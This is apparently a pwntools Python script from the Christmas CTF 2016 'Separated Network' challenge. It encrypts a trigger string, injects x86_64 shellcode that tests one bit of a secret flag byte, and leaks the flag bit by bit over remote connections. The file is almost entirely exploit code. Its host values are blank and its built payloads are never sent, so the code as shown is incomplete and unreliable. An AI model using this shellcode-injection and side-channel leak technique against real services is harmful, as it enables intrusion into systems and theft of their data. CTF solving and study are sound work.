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Created December 25, 2016 06:10
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Christmas CTF 2016 Separated Network
from pwn import *
from socket import AF_INET
import itertools
context.arch = 'x86_64'
def encrypt(x):
s = ''
key = [1, 2, 2, 1, 1, 1, 2, 2, 1, 1, 1, 2, 2, 1, 1]
for c, k in zip(x, itertools.cycle(key)):
s += chr(ord(c) ^ k)
return s
host = ''
port = 30303
host = ''
port = 12345
flag = bytearray('\x00' * 13)
print encrypt('SHELLCODER')
for index in range(13):
for bit in range(8):
r = remote('', 32123)
code = '''
mov al, byte ptr [0x601050+%d]
mov bl, %d
dec bl
and al, bl
jnz true
mov eax, 0x400653
jmp rax
mov eax, 0x400636
jmp rax
''' % (index, (1 << bit) + 1)
shellcode = asm(code)
payload = "SHELLCODER" + ''.ljust(10) + shellcode
inet_addr = lambda x: sum(int(x.split('.')[i])*(1<<8*(3-i)) for i in range(4))
obj = 'A' * 32 + p16(AF_INET) + p16(port, endian='big') + p32(inet_addr(host), endian='big') + 'a'
r.recvuntil('Messages are encrypted and Delivered.\n')
data = r.recvall()
print `data`, index, 1 << bit
if data == 'Message Sent successfully.':
flag[index] |= 1 << bit
print `flag`
flag = str(flag)
print flag
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